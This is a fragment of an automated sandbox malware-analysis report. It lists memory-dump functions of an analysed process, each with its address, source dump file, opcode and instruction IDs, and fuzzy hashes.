                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6046165598b0c82f14733da7886ccd732fa1517fc1048d2d0c3dadfc571122ff
                                                                    • Instruction ID: ad1fe3f3a36dec90133f38377039ec090fb7b86039caea955ab91fe5c2989663
                                                                    • Opcode Fuzzy Hash: 6046165598b0c82f14733da7886ccd732fa1517fc1048d2d0c3dadfc571122ff
                                                                    • Instruction Fuzzy Hash: 20F03175E042099F8B10EFA9E9856DEBFF4EB8D310B1440BAD505E7341EB319A09CBB5
                                                                    Function 00DC807E Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bffcee540502b0e07795d251adaab8f0770cc86e46d0c96b1d27afd3fe184f50
                                                                    • Instruction ID: 292db020d4434ab0619cc6738049ad6c9a6a99d6274ebddfced20f82acbb9827
                                                                    • Opcode Fuzzy Hash: bffcee540502b0e07795d251adaab8f0770cc86e46d0c96b1d27afd3fe184f50
                                                                    • Instruction Fuzzy Hash: 7001E134F152078FCB48EB64F5A8A6E7772FB843407108815D8525B79CDF795C01EB80
                                                                    Function 00A1D8A8 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2916403794.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_a1d000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd86a21ea4c772ec9b6349fefcceef9e5d1bc8d17c81d9662b93fcfc4755953f
                                                                    • Instruction ID: a22412c002ef6eefeffffd86b1cdac53390c19f37595f8e33ee6f88f47f9da21
                                                                    • Opcode Fuzzy Hash: fd86a21ea4c772ec9b6349fefcceef9e5d1bc8d17c81d9662b93fcfc4755953f
                                                                    • Instruction Fuzzy Hash: 52F06272404344AEEB208B56D9C4B66FFDCEB51734F18C45AED484B686C3799884CAB1
                                                                    Function 00DC80B1 Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cff4a79e9fb27c908ed631411bc1527146222f75993ad665291e842cc405b9ce
                                                                    • Instruction ID: 86719655436a5ba0e890bf97ec63b082e5ffadb67c3b51d9bded8d6aeb57512f
                                                                    • Opcode Fuzzy Hash: cff4a79e9fb27c908ed631411bc1527146222f75993ad665291e842cc405b9ce
                                                                    • Instruction Fuzzy Hash: AFF01234F0420BCFCB08EB64F59866E7772FB84340B108815D8429B39CDF795C01AB80
                                                                    Function 00DC80E4 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000001C.00000002.2918410355.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_28_2_dc0000_luglzv.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3c99c0aa2572f661957a1aae543fd85e1d51eefca7facf8c436cc349c8c7670
                                                                    • Instruction ID: 85511f6d9530a8cd78564143b9673155b0ad532496f9e26ca3b8fd72d587ddaa
                                                                    • Opcode Fuzzy Hash: d3c99c0aa2572f661957a1aae543fd85e1d51eefca7facf8c436cc349c8c7670
                                                                    • Instruction Fuzzy Hash: 87D05E34B001168BCB04E668A4546AD3772E784340B104410D8059B288DF344D129B81